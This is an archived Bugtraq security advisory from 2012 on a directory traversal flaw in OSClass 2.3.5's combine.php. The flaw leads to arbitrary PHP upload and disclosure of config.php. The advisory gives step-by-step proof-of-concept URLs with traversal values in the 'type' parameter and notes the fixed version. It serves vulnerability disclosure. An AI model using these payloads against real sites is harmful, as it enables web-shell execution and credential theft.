| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 7 Mar 2012 16:23:04 +0100 From: Filippo Cavallarin <filippo.cavallarin@...seq.it> To: bugtraq@...urityfocus.com Subject: OSClass directory traversal (leads to arbitrary file upload) Advisory ID: CSA-12004 Title: OSClass directory traversal vulnerability Product: OSClass Version: 2.3.5 and probably prior Vendor: osclass.org Vulnerability type: Directory traversal Risk level: 2 / 3 Credit: www.codseq.it Vendor notification: 2012-01-25 Public disclosure: 2012-03-07 Original advisory: http://www.codseq.it/advisories/osclass_directory_traversal_vulnerability OSClass version 2.3.5 and probably below suffers from a directory traversal vulnerability that leads to arbitrary file upload and information disclosure. The problem is in the modified version of combine.php. combine.php is used to merge multiple files into one to speed up page loading and implements a cache for generated files. It takes two get parameters: "files" which is a list of files to merge and "type" that specifies the type of returned file; as a security measure combine.php ensures that the requested files are in its same directory (including subdirs). combine.php fails to sanityze "type" get parameter before passing it to fwrite/fread calls. This allows an attacker to specify an arbitrary cache dir. 1) Arbitrary file upload. If a user can publish items and OSClass is configured to preserve a copy of the original image (default) it is possible to put an arbitrary file (ie a malicious php script) under the www root so shell commands can be executed with the privileges of the webserver. Proof of concept: 1. Take a php file and rename it .gif (not really needed since OSClass trusts mime type) 2. Upload that file as picture for a new item and get its name (is 5_small.jpg) 3. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding in combine.php) 4. Use combine.php to move itself to oc-content/uploads http://127.0.0.1/osclass/oc-content/themes/modern/combine.php?type=./../../uploads/combine.php&files=combine.php now we have a copy of combine.php placed into uploads dir (the same dir where our malicius php file has been uploaded) 5. Use uploads/combine.php to move 5_original.php to /remote.php http://127.0.0.1/osclass/oc-content/uploads/combine.php?files=5_original.jpg&type=/../../remote.php 6. Run the uploaded php file http://127.0.0.1/osclass/remote.php 2) Information disclosure vulnerability. It is possible to download and arbitrary file (ie config.php) under the www root. 1. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding) 2. Move combine.php into web root http://127.0.0.1/osclass/oc-content/themes/modern/combine.php?type=./../../../combine.php&files=combine.php 3. Run combine to download config.php http://127.0.0.1/osclass/combine.php?files=config.php Solution upgrade to OSClass 2.3.6 http://osclass.org/2012/03/05/osclass-2-3-6/ Filippo Cavallarin C o d S e q Development with an eye on security ------------------------------------------------------------------------ Castello 2005, 30122 Venezia Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254 c.f. CVLFPP82B27L736J - p.iva 03737650279 http://www.codseq.it - filippo.cavallarin@...seq.it
Powered by blists - more mailing lists